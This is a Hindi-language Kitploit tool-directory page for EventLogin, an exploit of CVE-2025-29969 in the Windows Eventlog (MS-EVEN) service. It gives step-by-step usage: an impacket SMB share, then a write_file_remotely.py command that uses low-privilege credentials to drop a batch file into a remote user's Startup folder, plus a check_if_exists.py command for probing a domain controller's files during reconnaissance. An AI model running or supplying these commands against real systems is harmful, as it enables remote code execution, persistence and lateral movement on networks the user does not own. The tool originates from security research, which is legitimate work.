Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EventLogin-CVE-2025-29969 — CVE-2025-29969 का शोषण | Kitploit
उपकरण/GitHubGitHub/safebreach-labs/eventlogin-cve-2025-29969
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंग
GitHubsafebreach-labs/eventlogin-cve-2025-29969

EventLogin-CVE-2025-29969

CVE-2025-29969 का शोषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
69156 महीने पहलेKitploit द्वारा समीक्षित

EventLogin - CVE-2025-29969

EventLogin, MS-EVEN प्रोटोकॉल में Time-of-check time-of-use भेद्यता है। यह भेद्यता निम्न-विशेषाधिकार प्राप्त उपयोगकर्ताओं को दूरस्थ मशीन पर मनमानी फ़ाइलें लिखने में सक्षम बनाती है, जिससे दूरस्थ लेखन के लिए प्रशासक खाते की आवश्यकता प्रभावी रूप से समाप्त हो जाती है।

इस रिपॉजिटरी में दो स्क्रिप्ट हैं, एक भेद्यता को हथियार बनाती है (write_file_remotely.py), और दूसरी भेद्यता के एक प्रिमिटिव का उपयोग करके जाँच करती है कि कोई दूरस्थ फ़ाइल मौजूद है या नहीं, एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में, जो उदाहरण के लिए, डोमेन में अन्य कंप्यूटरों पर स्थापित प्रोग्राम देखने के लिए उपयोगी है।

आप यहाँ पूर्ण विश्लेषण पढ़ सकते हैं:

EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows

write_file_remotely का उपयोग

पहले, impacket का उपयोग करके SMB शेयर बनाएँ:

root@kitploit:~
impacket-smbserver -smb2support Share /tmp/safebreach

ध्यान दें, स्क्रिप्ट हार्ड-कोडेड 'Share' को शेयर नाम के रूप में उपयोग कर रही है, आवश्यकता होने पर इसे संशोधित करें।

फिर, write_file_remotely.py स्क्रिप्ट चलाएँ और सभी आवश्यक पैरामीटर शामिल करें:

  1. ip_to_attack - दूरस्थ मशीन का IP.
  2. smb_server_ip - उस मशीन का IP जिस पर आपने शेयर खोला है, हमलावर मशीन भी हो सकती है।
  3. username और password - निम्न-विशेषाधिकार खाते के क्रेडेंशियल्स।
  4. valid_evtx_file_path - एक मान्य EVTX फ़ाइल का पथ जिसे आप उसी शेयर में संग्रहीत करते हैं जिसे आपने पहले खोला था।
  5. local_file_path - वह फ़ाइल जिसे आप अपलोड करना चाहते हैं।
  6. remote_file_path - वह दूरस्थ फ़ाइल पथ जिस पर आप अपलोड करना चाहते हैं।

उदाहरण:

root@kitploit:~
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"

check_if_exists का उपयोग

यह स्क्रिप्ट स्वयं भेद्यता का उपयोग नहीं करती है, यह केवल "CreateFile" प्रिमिटिव का उपयोग करती है और नेटवर्क की recon करने में आपकी सहायता कर सकती है।

उदाहरण के लिए, डोमेन में किसी दूरस्थ मशीन का Program Files निर्देशिका पूरे 'Users' समूह के लिए सुलभ है, जिसका अर्थ है कि किसी भी उपयोगकर्ता के क्रेडेंशियल्स का उपयोग करके आप जाँच सकते हैं कि किसी अन्य मशीन में कोई फ़ाइल मौजूद है या नहीं।

यह निम्नलिखित पैरामीटर स्वीकार करता है:

  1. ip_to_attack - recon के लिए IP
  2. username - डोमेन उपयोगकर्ता का उपयोगकर्ता नाम और पासवर्ड।
  3. filepath_to_check - जाँच करने के लिए एक फ़ाइल

उदाहरण के लिए, एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता का उपयोग करके देखें कि DC (192.168.56.57) पर wireshark स्थापित है या नहीं।

root@kitploit:~
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"

परिणाम:
FILE_EXISTS_AND_IS_DIRECTORY
टूल डाउनलोड करें